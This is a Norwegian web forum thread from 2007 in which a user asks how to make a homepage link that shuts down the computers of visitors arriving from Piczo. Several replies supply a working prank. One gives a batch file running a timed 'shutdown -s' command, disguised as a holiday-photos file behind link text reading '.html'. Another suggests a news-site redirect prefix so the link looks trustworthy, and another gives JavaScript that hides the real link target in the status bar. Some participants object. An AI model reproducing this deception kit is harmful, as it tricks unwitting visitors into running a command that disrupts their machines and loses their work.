VisualStudio Skrevet 9. mai 2007 Del Skrevet 9. mai 2007 (endret) Hei! Jeg vet ikke om det er mulig, men går det ann å lage en link på hjemmesiden, som skrur av datamaskinen eller noe liknende? Edit: Dette er da hvis en piczo bruker entrer siden min, så blir det en link "Piczo brukere, klikker her" type ting:P Så om det da kunne skjedd noe morsomt:P Takk Endret 9. mai 2007 av VisualStudio Lenke til kommentar
Ozwald Skrevet 9. mai 2007 Del Skrevet 9. mai 2007 Da må du nok ha en link til et program som lastes ned eller lignende. Eller finne et stort sikkerhetshull i ActiveX eller noe som du kan utnytte.. Med andre ord, for den gjennomsnittlige bruker; nei. Lenke til kommentar
HilRam Skrevet 9. mai 2007 Del Skrevet 9. mai 2007 Da må brukeren godta kjøring av et program. I Notepad kan du kan lage en fil som du kaller f.eks. "verify.bat", som inneholder flg. kode: @echo off shutdown -s Det er alt som trengs. Streng tatt trenger du ikke echo off, men da ser brukeren (hvis han/hun er snar) hva som skjer. Lenke til kommentar
Anders Moen Skrevet 9. mai 2007 Del Skrevet 9. mai 2007 Hva om disse Piczo-brukerene har lyst å lære seg HTML (evt. XHTML) og CSS, så de vil se i HTML-fila og CSS-fila di da? Veldig synd at den/de person(ene) kanskje hadde trykka på den linken så pc'en deres hadde skrudd seg av. Jeg ville i hvert fall aldri ha kommet tilbake til sida di da... Lenke til kommentar
VisualStudio Skrevet 9. mai 2007 Forfatter Del Skrevet 9. mai 2007 Jeg ville i hvert fall aldri ha kommet tilbake til sida di da... 8574578[/snapback] Nei, det er ikke meningen heller. Og piczo brukere klarer ikke å vise kildekoden Lenke til kommentar
Anders Moen Skrevet 9. mai 2007 Del Skrevet 9. mai 2007 Å jo da. De gjør nok det. Har til og med kamerater av meg som klarer det Lenke til kommentar
VisualStudio Skrevet 9. mai 2007 Forfatter Del Skrevet 9. mai 2007 Å jo da. De gjør nok det. Har til og med kamerater av meg som klarer det 8574863[/snapback] Seriøst? Men egentlig driter jeg i det:P Haha. Jeg hater Piczo, veldig Lenke til kommentar
Jooakim Skrevet 9. mai 2007 Del Skrevet 9. mai 2007 Åpne notisblokk og skriv følgende; @echo offshutdown -s -t 10 -c "Pass på hva du laster ned!" Lagre filen som feriebilder.bat ellerno. <a href="home.no/bilder/feriebilder.bat">home.no/bilder/feriebilder.html</a> Et annet tips, er å legge http://go.dagbladet.no/ego.cgi/dbf_oppsl1/ foran en link, slik at de tror at du kommer til dagbladet: http://go.dagbladet.no/ego.cgi/dbf_oppsl1/...owuser=122331&s Lenke til kommentar
backup Skrevet 10. mai 2007 Del Skrevet 10. mai 2007 Hvis du vil hindre at home.no/bilder/feriebilder.bat vises i browserens statusfelt nede til venstre, kan du med et lite javascript gjøre det slik: <html> <head> <script> var statusText="" function skjulStatus(){ window.status=statusText return true } </script> </head> <body> <a href="home.no/bilder/feriebilder.bat" onMouseover= "return skjulStatus()">home.no/bilder/feriebilder.html</a> </body> </html> Lenke til kommentar
Moonshine Skrevet 10. mai 2007 Del Skrevet 10. mai 2007 (endret) Kan du ikke heller skrive "Piczo-brukere, dere er dumme? Gå vekk fra siden min?" Tror det har like stor effekt. Ingen kjører en .bat fil, våkne opp. MEN, hvis du absolutt må gjøre noe dumt med Piczo brukere, check etter referer med PHP og send header location til disney.com. Endret 10. mai 2007 av Jonas Drange Lenke til kommentar
KillYou Skrevet 10. mai 2007 Del Skrevet 10. mai 2007 jeg er mest spent på hvordan du skal finne ut hvem som er piczo brukerene Lenke til kommentar
Jooakim Skrevet 10. mai 2007 Del Skrevet 10. mai 2007 Jeg snakket med NorthGarden på IRC, og han fikset en side hvor han brukte en blanding av mitt og HilRams script, samt backups javascript. http://diversebilder.moo.no/ Det som er problemet her, er at i alle browsere utenom IE, åpnes et nytt vindu hvor en ser kommandoen - som en .txt-fil. Lenke til kommentar
Cucum(r) Skrevet 10. mai 2007 Del Skrevet 10. mai 2007 jeg er mest spent på hvordan du skal finne ut hvem som er piczo brukerene 8582572[/snapback] http://en.wikipedia.org/wiki/HTTP_referer er flott. Lenke til kommentar
Moonshine Skrevet 10. mai 2007 Del Skrevet 10. mai 2007 jeg er mest spent på hvordan du skal finne ut hvem som er piczo brukerene 8582572[/snapback] http://c2.com/cgi/test/ Oh noes. Anonymity, where? Lenke til kommentar
KillYou Skrevet 11. mai 2007 Del Skrevet 11. mai 2007 Oki da var det jeg som hadde misforstått, jeg trodde poenget var å finne ut hvem som brukte piczo, ikke hvem som kom til din side via en piczo side. Jeg tolket piczo brukere som: brukere av tjenesten til piczo. Så vist jeg kommer til siden din fra en piczo zide så er jeg er en dårligere person og fortjener derfor å få dette her? Lenke til kommentar
HilRam Skrevet 11. mai 2007 Del Skrevet 11. mai 2007 (endret) Jeg snakket med NorthGarden på IRC, og han fikset en side hvor han brukte en blanding av mitt og HilRams script, samt backups javascript. http://diversebilder.moo.no/ Det som er problemet her, er at i alle browsere utenom IE, åpnes et nytt vindu hvor en ser kommandoen - som en .txt-fil. 8582990[/snapback] Testet den i går og som du sier, det funker jo fint i IE. Hvorfor er du så snill og gir de 60 sekunder til å avslutte/lagre? 15 sek burde holde i massevis. Det at det ikke fungerer i f.eks. Opera, er jo et tegn på at Opera/Firefox fortsatt er hakket bedre en IE på sikkerhet. Endret 11. mai 2007 av HilRam Lenke til kommentar
Moonshine Skrevet 11. mai 2007 Del Skrevet 11. mai 2007 (endret) I tillegg er jo Internet Explorer brukere ignorant. Endret 11. mai 2007 av Jonas Drange Lenke til kommentar
Jooakim Skrevet 11. mai 2007 Del Skrevet 11. mai 2007 Testet den i går og som du sier, det funker jo fint i IE. 8586397[/snapback] Hvis du leser en gang til hva jeg skrev, så ser du at jeg skriver at det fungerer i IE, men ikke i Opera og Firefox. Lenke til kommentar
VisualStudio Skrevet 11. mai 2007 Forfatter Del Skrevet 11. mai 2007 (endret) Er det noen som klarer å sette sammen et script, som sier "Du har ikke tilgang, du kommer fra en Piczo side", hvis referer inneholder .piczo.com ? Endret 11. mai 2007 av VisualStudio Lenke til kommentar
Runar Skrevet 11. mai 2007 Del Skrevet 11. mai 2007 Hvorfor? Du vil stenge ute ALLE som kommer fra en piczo-side fra å komme inn på siden din? Hva om f.eks. jeg som misliker piczo har besøkt en piczo-side, vil inn på siden din? Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå